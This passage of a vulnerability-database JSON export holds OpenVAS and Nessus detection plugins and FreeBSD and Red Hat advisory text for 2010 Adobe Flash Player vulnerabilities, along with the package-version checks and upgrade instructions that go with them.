"CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-09.", "modified": "2019-03-14T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:136141256231069045", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069045", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-09 (adobe-flash)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201101_09.nasl 14171 2019-03-14 10:22:03Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69045\");\n script_version(\"$Revision: 14171 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 11:22:03 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-0186\", \"CVE-2010-0187\", \"CVE-2010-0209\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", 
\"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2884\", \"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"Gentoo Security Advisory GLSA 201101-09 (adobe-flash)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Flash Player might allow remote attackers\n to execute arbitrary code or cause a Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest stable\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.1.102.64'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-09\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=307749\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=322855\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=332205\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=337204\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=343089\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-06.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n 
script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-16.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-22.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201101-09.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.1.102.64\"), vulnerable: make_list(\"lt 10.1.102.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-05T11:22:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", 
"CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-09.", "modified": "2017-09-04T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:69045", "href": "http://plugins.openvas.org/nasl.php?oid=69045", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-09 (adobe-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Flash Player might allow remote attackers\n to execute arbitrary code or cause a Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest stable\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.1.102.64'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-09\nhttp://bugs.gentoo.org/show_bug.cgi?id=307749\nhttp://bugs.gentoo.org/show_bug.cgi?id=322855\nhttp://bugs.gentoo.org/show_bug.cgi?id=332205\nhttp://bugs.gentoo.org/show_bug.cgi?id=337204\nhttp://bugs.gentoo.org/show_bug.cgi?id=343089\nhttp://www.adobe.com/support/security/bulletins/apsb10-06.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-14.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-16.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-22.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201101-09.\";\n\n \n \n\nif(description)\n{\n script_id(69045);\n script_version(\"$Revision: 7052 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-04 13:50:51 +0200 (Mon, 04 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-0186\", \"CVE-2010-0187\", \"CVE-2010-0209\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", 
\"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2884\", \"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"Gentoo Security Advisory GLSA 201101-09 (adobe-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.1.102.64\"), vulnerable: make_list(\"lt 10.1.102.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:04", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nCritical vulnerabilities have been identified in\n\t Adobe Flash Player 10.1.85.3 and earlier versions for\n\t Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player\n\t 10.1.95.1 for Android. 
These vulnerabilities, including\n\t CVE-2010-3654 referenced in Security Advisory APSA10-05,\n\t could cause the application to crash and could potentially\n\t allow an attacker to take control of the affected system.\n\n", "edition": 4, "modified": "2010-09-28T00:00:00", "published": "2010-09-28T00:00:00", "id": "76B597E4-E9C6-11DF-9E10-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html", "title": "linux-flashplugin -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:08:27", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 4 Extras.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. 
Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.289.0.", "edition": 25, "published": "2013-01-24T00:00:00", "title": "RHEL 4 : flash-plugin (RHSA-2010:0834)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:4.8"], "id": "REDHAT-RHSA-2010-0834.NASL", "href": "https://www.tenable.com/plugins/nessus/63957", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0834. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63957);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_bugtraq_id(44504, 44675, 44677, 44678, 44679, 44680, 44681, 44682, 44683, 44684, 44685, 44686, 44687, 44691, 44692);\n script_xref(name:\"RHSA\", value:\"2010:0834\");\n\n script_name(english:\"RHEL 4 : flash-plugin (RHSA-2010:0834)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 4 Extras.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. 
An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.289.0.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3641.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3643.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3644.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3645.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3646.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.redhat.com/security/data/cve/CVE-2010-3647.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3648.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3649.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3650.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3652.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3654.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0834.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"flash-plugin-9.0.289.0-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"flash-plugin-9.0.289.0-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:26", "description": "An updated Adobe Flash Player package that fixes multiple 
security\nissues is now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. 
Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.", "edition": 27, "published": "2013-01-24T00:00:00", "title": "RHEL 5 : flash-plugin (RHSA-2010:0829)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin"], "id": "REDHAT-RHSA-2010-0829.NASL", "href": "https://www.tenable.com/plugins/nessus/63956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0829. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63956);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_bugtraq_id(44504, 44675, 44677, 44678, 44679, 44680, 44681, 44682, 44683, 44684, 44685, 44686, 44687, 44691, 44692);\n script_xref(name:\"RHSA\", value:\"2010:0829\");\n\n script_name(english:\"RHEL 5 : flash-plugin (RHSA-2010:0829)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. 
